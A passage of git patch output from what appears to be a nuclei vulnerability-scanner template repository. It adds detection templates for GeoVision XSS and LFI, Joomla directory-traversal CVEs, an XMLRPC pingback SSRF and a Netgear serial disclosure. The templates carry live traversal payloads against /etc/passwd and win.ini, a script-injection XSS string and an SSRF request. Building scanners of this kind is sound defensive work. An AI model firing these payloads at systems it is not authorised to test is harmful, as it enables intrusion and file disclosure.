file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 4effb1a176..e7ac38b27b 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -27,7 +27,7 @@ requests: regex: - '(?i)key(sinternal|up|down|press|boardnavigation|words?|board|ebrow|board_fill|_retry_interval|_fetched|_expiresat|board_shortcuts|s_close|s_previous|s_next|s_zoom|s_play_pause)' - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' - - '(?i)(?!native)|(.*keybindings)' + - '(?i)(!native)|(.*keybindings)' - '(?i)(layout|a)key' condition: or negative: true From c631ad3b784fbd2e36932558c8485b4ec7995a3b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 22:49:49 +0530 Subject: [PATCH 1702/4083] Update tectuus-scada-monitor.yaml --- exposed-panels/tectuus-scada-monitor.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/tectuus-scada-monitor.yaml b/exposed-panels/tectuus-scada-monitor.yaml index 8bde66d3f5..ef44c69a43 100644 --- a/exposed-panels/tectuus-scada-monitor.yaml +++ b/exposed-panels/tectuus-scada-monitor.yaml @@ -12,8 +12,6 @@ requests: path: - "{{BaseURL}}" - redirects: true - matchers-condition: and matchers: - type: status From f60cef447bbe579c5d152bbb00e960474fa84dde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 17 Aug 2021 22:57:34 +0530 Subject: [PATCH 1703/4083] Update generic-blind-xxe.yaml --- vulnerabilities/generic/generic-blind-xxe.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml index 4d7cb40f23..f88705f494 100644 --- a/vulnerabilities/generic/generic-blind-xxe.yaml +++ b/vulnerabilities/generic/generic-blind-xxe.yaml @@ -23,7 +23,6 @@ requests: &e1; - redirects: true matchers: - type: word From 0c24cc2f748b8cc9ed280cf0e7ed9af31febcda1 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 18 Aug 2021 03:50:39 +0530 Subject: [PATCH 1704/4083] Create geovision-geowebserver-xss.yaml --- .../other/geovision-geowebserver-xss.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/geovision-geowebserver-xss.yaml diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml new file mode 100644 index 0000000000..110a0cc8be --- /dev/null +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -0,0 +1,28 @@ +id: geowebserver-xss + +info: + name: GeoVision Geowebserver 5.3.3 - XSS + author: madrobot + severity: medium + reference: https://www.exploit-db.com/exploits/50211 + tags: geowebserver,xss + +requests: + - raw: + - | + GET /Visitor/bin/WebStrings.srf?file=&obj_name= HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 + Accept: */* + + matchers-condition: and + matchers: + + - type: regex + regex: + - "" + part: body + + - type: status + status: + - 200 From d5748c95fc1e5792664f8da2f30462097707546e Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 18 Aug 2021 03:50:45 +0530 Subject: [PATCH 1705/4083] Create geovision-geowebserver-lfi.yaml --- .../other/geovision-geowebserver-lfi.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/geovision-geowebserver-lfi.yaml diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml new file mode 100644 index 0000000000..b21cc51e04 --- /dev/null +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -0,0 +1,26 @@ +id: geowebserver-lfi + +info: + name: GeoVision Geowebserver 5.3.3 - LFI + author: madrobot + severity: high + reference: https://www.exploit-db.com/exploits/50211 + tags: geowebserver,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini" + - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + + - type: status + status: + - 200 From db4073d2b5dcc4dabd5c60d1068a9ee4c4a44e42 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 18 Aug 2021 03:54:30 +0530 Subject: [PATCH 1706/4083] Update geovision-geowebserver-lfi.yaml --- vulnerabilities/other/geovision-geowebserver-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index b21cc51e04..42bfdf0ac8 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini" + - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" matchers-condition: and From eeb284a7ec8f01b93c05a8a6124bd81d1c5930a2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 14:48:34 +0530 Subject: [PATCH 1707/4083] Update geovision-geowebserver-xss.yaml --- vulnerabilities/other/geovision-geowebserver-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index 110a0cc8be..697eaa8792 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -9,7 +9,7 @@ info: requests: - raw: - - | + - | GET /Visitor/bin/WebStrings.srf?file=&obj_name= HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 From 1db2715a062fc80867349152036c02b566362d11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 14:51:23 +0530 Subject: [PATCH 1708/4083] Update geovision-geowebserver-xss.yaml --- vulnerabilities/other/geovision-geowebserver-xss.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index 697eaa8792..c5e0e08aeb 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -10,7 +10,7 @@ info: requests: - raw: - | - GET /Visitor/bin/WebStrings.srf?file=&obj_name= HTTP/1.1 + GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: */* @@ -20,9 +20,14 @@ requests: - type: regex regex: - - "" + - "" part: body - type: status status: - 200 + + - type: word + part: header + words: + - text/html From 93fa26376fb584fa1fe8b090b60feaa59c8fabdc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 18 Aug 2021 17:44:40 +0700 Subject: [PATCH 1709/4083] Create CVE-2010-1495.yaml --- cves/2010/CVE-2010-1495.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1495.yaml diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml new file mode 100644 index 0000000000..ee4f0d6ef6 --- /dev/null +++ b/cves/2010/CVE-2010-1495.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1495 + +info: + name: Joomla! Component Matamko 1.01 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12286 + - https://www.cvedetails.com/cve/CVE-2010-1495 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 0731a772d48da96dc57ee1fc4dc6a90bc79faa1d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:18:12 +0530 Subject: [PATCH 1710/4083] Update geovision-geowebserver-lfi.yaml --- vulnerabilities/other/geovision-geowebserver-lfi.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 42bfdf0ac8..8e4768db23 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -16,9 +16,12 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "\\[(font|extension|file)s\\]" + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and part: body - type: status From 47e657e1584459b78546a9da9c2495146c3b950e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 18 Aug 2021 17:51:05 +0700 Subject: [PATCH 1711/4083] Create CVE-2010-1875.yaml --- cves/2010/CVE-2010-1875.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1875.yaml diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml new file mode 100644 index 0000000000..1f3d3ef5cd --- /dev/null +++ b/cves/2010/CVE-2010-1875.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1875 + +info: + name: Joomla! Component Property - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11851 + - https://www.cvedetails.com/cve/CVE-2010-1875 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 067c9a8755ea35484d5bfa57056bb043cc742d93 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:39:22 +0530 Subject: [PATCH 1712/4083] Create xmlrpc-pingback-ssrf.yaml --- .../generic/xmlrpc-pingback-ssrf.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml new file mode 100644 index 0000000000..8f5fe418de --- /dev/null +++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -0,0 +1,36 @@ +id: xmlrpc-pingback-ssrf + +info: + name: XMLRPC Pingback SSRF + author: geeknik + reference: https://hackerone.com/reports/406387 + severity: high + tags: ssrf,generic + +requests: + - raw: + - | + POST /xmlrpc/pingback HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 + Connection: close + Upgrade-Insecure-Requests: 1 + Content-Length: 305 + + + + pingback.ping + + + http://{{interactsh-url}} + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh-protocol + words: + - "http" From af15e4817f01cadeb3cf464982855b85c0273882 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:42:34 +0530 Subject: [PATCH 1713/4083] Update netgear-router-auth-bypass.yaml --- vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 332c456650..f2d94ceba8 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 - tags: netgear,auth-bypass + tags: netgear,auth-bypass,router requests: - raw: From d07323e0be5cd82efce02afc0e31bb4e3e58cf11 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:44:28 +0530 Subject: [PATCH 1714/4083] Create netgear-router-disclosure.yaml --- .../other/netgear-router-disclosure.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/netgear-router-disclosure.yaml diff --git a/vulnerabilities/other/netgear-router-disclosure.yaml b/vulnerabilities/other/netgear-router-disclosure.yaml new file mode 100644 index 0000000000..3fbfc551d7 --- /dev/null +++ b/vulnerabilities/other/netgear-router-disclosure.yaml @@ -0,0 +1,32 @@ +id: netgear-router-disclosure + +info: + name: Netgear Router S/N Disclosure + description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. + reference: + - https://www.exploit-db.com/exploits/47117 + - https://www.exploit-db.com/exploits/45741 + author: geeknik + severity: critical + tags: netgear,disclosure,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/rootDesc.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + - "" + condition: and + extractors: + - type: regex + name: serial_number + regex: + - ">(.*)<" From 0a0b5c7f748586ed91bf78308c71a24c1a96c977 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 18 Aug 2021 16:56:56 +0530 Subject: [PATCH 1715/4083] Update netgear-router-disclosure.yaml --- .../other/netgear-router-disclosure.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/netgear-router-disclosure.yaml b/vulnerabilities/other/netgear-router-disclosure.yaml index 3fbfc551d7..e0e1dc8085 100644 --- a/vulnerabilities/other/netgear-router-disclosure.yaml +++ b/vulnerabilities/other/netgear-router-disclosure.yaml @@ -20,13 +20,22 @@ requests: - type: status status: - 200 + - 501 + - type: word words: - "" - - "" + - "" + - "" condition: and + + - type: word + part: header + words: + - text/xml + extractors: - type: regex - name: serial_number + group: 1 regex: - - ">(.*)<" + - "([A-Z0-9]+)<\\/serialNumber>" From 4c920b2552e524196f129b13447170d1bb1159d0 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Wed, 18 Aug 2021 14:29:20 +0300 Subject: [PATCH 1716/4083] Rename "references" to "reference" to match the expected template info structure Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2019/CVE-2019-12725.yaml | 2 +- cves/2019/CVE-2019-15858.yaml | 3 +-- cves/2019/CVE-2019-6112.yaml | 2 +- cves/2020/CVE-2020-17506.yaml | 2 +- cves/2020/CVE-2020-2551.yaml | 3 +-- cves/2020/CVE-2020-27986.yaml | 2 +- cves/2020/CVE-2020-4463.yaml | 2 +- cves/2020/CVE-2020-7318.yaml | 2 +- cves/2020/CVE-2020-8209.yaml | 2 +- cves/2021/CVE-2021-24176.yaml | 2 +- exposures/tokens/generic/shoppable-token.yaml | 2 +- technologies/bolt-cms-detect.yaml | 2 +- technologies/bookstack-detect.yaml | 2 +- technologies/grav-cms-detect.yaml | 2 +- technologies/mautic-crm-detect.yaml | 2 +- technologies/moinmoin-detect.yaml | 2 +- technologies/octobercms-detect.yaml | 2 +- technologies/opencast-detect.yaml | 2 +- technologies/plone-cms-detect.yaml | 2 +- technologies/rhymix-cms-detect.yaml | 2 +- technologies/shopware-detect.yaml | 2 +- technologies/strapi-cms-detect.yaml | 2 +- technologies/wazuh-detect.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../wordpress/wordpress-wpcourses-info-disclosure.yaml | 2 +- 25 files changed, 25 insertions(+), 27 deletions(-) diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index 9edb11b0c3..9c6e45ad88 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -9,7 +9,7 @@ info: found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute /bin/tar without a password (NOPASSWD) it is possible to run root commands using the "checkpoint" tar options. - references: | + reference: | - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py tags: cve,cve2019,rce diff --git a/cves/2019/CVE-2019-15858.yaml b/cves/2019/CVE-2019-15858.yaml index f243e8b2af..104ee2be4e 100644 --- a/cves/2019/CVE-2019-15858.yaml +++ b/cves/2019/CVE-2019-15858.yaml @@ -11,8 +11,7 @@ info: before 2.2.5 for WordPress allows unauthenticated options import, as demonstrated by storing an XSS payload for remote code execution. - Source/References: - - https://github.com/GeneralEG/CVE-2019-15858 + reference: https://github.com/GeneralEG/CVE-2019-15858 tags: cve,cve2019,wordpress,wp-plugin,xss requests: diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml index 0346e41859..d8c76b9925 100644 --- a/cves/2019/CVE-2019-6112.yaml +++ b/cves/2019/CVE-2019-6112.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: medium description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). - references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b + reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b tags: cve,cve2019,wordpress,wp-plugin,xss requests: diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index 1770ca102b..f22e184fd5 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml @@ -6,7 +6,7 @@ info: severity: critical description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 - references: https://blog.max0x4141.com/post/artica_proxy/ + reference: https://blog.max0x4141.com/post/artica_proxy/ requests: - method: GET diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index 18ed900de0..c861f6b44a 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -17,8 +17,7 @@ info: Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. - Source/References: - - https://github.com/hktalent/CVE-2020-2551 + reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce requests: diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index 11af6fe532..fa8541d74b 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -8,7 +8,7 @@ info: SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." - references: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ + reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube requests: diff --git a/cves/2020/CVE-2020-4463.yaml b/cves/2020/CVE-2020-4463.yaml index d4f6d47a22..ef5ab6ed1e 100644 --- a/cves/2020/CVE-2020-4463.yaml +++ b/cves/2020/CVE-2020-4463.yaml @@ -10,7 +10,7 @@ info: A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. - references: | + reference: | - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 tags: cve,cve2020,ibm,xxe diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 94e003c672..0d6ceac8da 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -10,7 +10,7 @@ info: script or HTML via multiple parameters where the administrator's entries were not correctly sanitized. - References: + reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: cve,cve2020,xss diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index ab58540906..6b7489c55f 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml @@ -9,7 +9,7 @@ info: Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files. - References: + reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ tags: cve,cve2020,citrix,lfi diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index e79ac758f3..07ad8546f2 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -5,7 +5,7 @@ info: author: Ganofins severity: medium description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. - references: | + reference: | - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 4a20a97a81..0f68803be2 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -4,7 +4,7 @@ info: name: Shoppable Service Auth Token author: philippedelteil severity: info - references: https://ask.shoppable.com/knowledge/quick-start-api-guide + reference: https://ask.shoppable.com/knowledge/quick-start-api-guide requests: - method: GET diff --git a/technologies/bolt-cms-detect.yaml b/technologies/bolt-cms-detect.yaml index 870ff9f428..f6b2118809 100644 --- a/technologies/bolt-cms-detect.yaml +++ b/technologies/bolt-cms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects bolt CMS tags: tech,bolt,cms - references: + reference: - https://github.com/bolt/bolt requests: diff --git a/technologies/bookstack-detect.yaml b/technologies/bookstack-detect.yaml index fc2da96253..6dde7e550c 100644 --- a/technologies/bookstack-detect.yaml +++ b/technologies/bookstack-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects BookStack tags: tech,bookstack - references: https://github.com/BookStackApp/BookStack + reference: https://github.com/BookStackApp/BookStack requests: - method: GET diff --git a/technologies/grav-cms-detect.yaml b/technologies/grav-cms-detect.yaml index ad25f0365a..168a866015 100644 --- a/technologies/grav-cms-detect.yaml +++ b/technologies/grav-cms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Grav CMS tags: tech,grav,cms - references: https://github.com/getgrav/grav + reference: https://github.com/getgrav/grav requests: - method: GET diff --git a/technologies/mautic-crm-detect.yaml b/technologies/mautic-crm-detect.yaml index 23fab5db7c..42d0c4df6f 100644 --- a/technologies/mautic-crm-detect.yaml +++ b/technologies/mautic-crm-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Mautic CRM tags: tech,mautic,crm - references: + reference: - https://github.com/mautic/mautic requests: diff --git a/technologies/moinmoin-detect.yaml b/technologies/moinmoin-detect.yaml index 11245a0d7c..063d5b0c3f 100644 --- a/technologies/moinmoin-detect.yaml +++ b/technologies/moinmoin-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects MoinMoin Wiki tags: tech,moin,moinmoin,wiki - references: + reference: - https://github.com/moinwiki/moin-1.9 requests: diff --git a/technologies/octobercms-detect.yaml b/technologies/octobercms-detect.yaml index 63b0c367f3..1b5b221c6c 100644 --- a/technologies/octobercms-detect.yaml +++ b/technologies/octobercms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects OctoberCMS tags: tech,octobercms - references: https://github.com/octobercms/october + reference: https://github.com/octobercms/october requests: - method: GET diff --git a/technologies/opencast-detect.yaml b/technologies/opencast-detect.yaml index cde50dfadf..ef5d34d8e8 100644 --- a/technologies/opencast-detect.yaml +++ b/technologies/opencast-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Opencast tags: tech,opencast - references: + reference: - https://github.com/opencast/opencast requests: diff --git a/technologies/plone-cms-detect.yaml b/technologies/plone-cms-detect.yaml index f9ef9737b7..08791ef3f5 100644 --- a/technologies/plone-cms-detect.yaml +++ b/technologies/plone-cms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Plone CMS tags: tech,plone,cms - references: + reference: - https://github.com/plone/Products.CMFPlone requests: diff --git a/technologies/rhymix-cms-detect.yaml b/technologies/rhymix-cms-detect.yaml index 9f946b8fc7..2e2299fb4f 100644 --- a/technologies/rhymix-cms-detect.yaml +++ b/technologies/rhymix-cms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Rhymix CMS tags: tech,rhymix - references: https://github.com/rhymix/rhymix + reference: https://github.com/rhymix/rhymix requests: - method: GET diff --git a/technologies/shopware-detect.yaml b/technologies/shopware-detect.yaml index 0a5371d0e8..1ec4dee4f3 100644 --- a/technologies/shopware-detect.yaml +++ b/technologies/shopware-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects Shopware CMS tags: tech,shopware,cms - references: + reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform diff --git a/technologies/strapi-cms-detect.yaml b/technologies/strapi-cms-detect.yaml index d8a30233f9..1008f11d25 100644 --- a/technologies/strapi-cms-detect.yaml +++ b/technologies/strapi-cms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects strapi CMS tags: tech,strapi,cms - references: + reference: - https://github.com/strapi/strapi requests: diff --git a/technologies/wazuh-detect.yaml b/technologies/wazuh-detect.yaml index 061429b6fd..2961a8e89c 100644 --- a/technologies/wazuh-detect.yaml +++ b/technologies/wazuh-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: Detects wazuh tags: tech,wazuh - references: + reference: - https://github.com/wazuh/wazuh requests: diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..07da44fc86 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -12,7 +12,7 @@ info: making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. - References: + reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: mcafee,rce diff --git a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml index 5ab5a09e4a..054a5819d2 100644 --- a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml +++ 